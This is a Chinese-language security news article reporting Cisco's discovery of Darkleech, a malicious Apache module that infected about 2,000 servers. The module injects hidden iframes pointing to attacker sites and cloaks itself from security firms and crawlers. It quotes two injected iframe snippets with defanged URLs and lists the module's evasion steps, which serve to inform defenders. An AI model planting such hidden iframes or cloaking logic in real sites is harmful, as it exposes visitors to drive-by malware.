日前,网络供应商思科发表博客表示,发现一款名为Darkleech的恶意软件利在网络大肆传播,在受害站点上嵌入iframe,目前已感染了大约2000台服务器,架设每台服务器十个站点的话,至少有20000个网站被感染,其中包括知名网站如《洛杉矶时报》。

Darkleech主要使用了Apache的模块注入iframe到受害站点中,模块名称如mod_spm_headers.so 或 mod_spm_mem.so,该模块主要功能如下:

1:过滤来自搜索引擎和安全公司的IP地址
2:过滤User-Agent是robot、自动化工具(如Curl, Indy Library等),以及一些IPHONE手机移动客户端等
3:过滤黑名单IP
4:最为复杂的一点,当确认该IP是自然流量之后,该模块会创建一个保持5分钟的session给该IP,然后请求一个js地址,如果用户在该页面浏览了js,那在接下来的7天里不会重复该动作。
5:嵌入恶意的iframe,见下。

该模块可能在每台服务器上名称不同,当用户访问目标站网站的时候会被连接到恶意的站点。如下代码:

<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px} </style> <div class="tlqvepxi">
<iframe src="hxxp://matisere .com/21234443.html" width="581" height="476"></iframe></div>

以及

document.write('<style>.hmfabv9 { position:absolute; left:-1141px; top:-1518px} </style> <div class="hmfabv9">
<iframe src="hxxp://sepatch .org/35204443.html" width="122" height="202"></iframe></div>');

所有的数字和style的名称都是随机生成,并且每天数次同步感染受害者的服务器,检查iframe是否存在。因为网站的其他源码没有变化,所以管理员及时发现被嵌入了iframe,但是很难检测到问题出在哪里。并且如果来自安全公司和托管公司的IP地址访问了被感染的网站,它不会在终端用户展示的网页中嵌入恶意链接

恶意软件Darkleech大肆感染Apache服务器

目前还不清楚攻击者利用了什么弱点入侵Apache机器,安全研究人员怀疑漏洞可能存在于用于管理网站的软件如Plesk和Cpanel中,也不排除密码破解和社会工程等攻击方法的可能性。

freebuf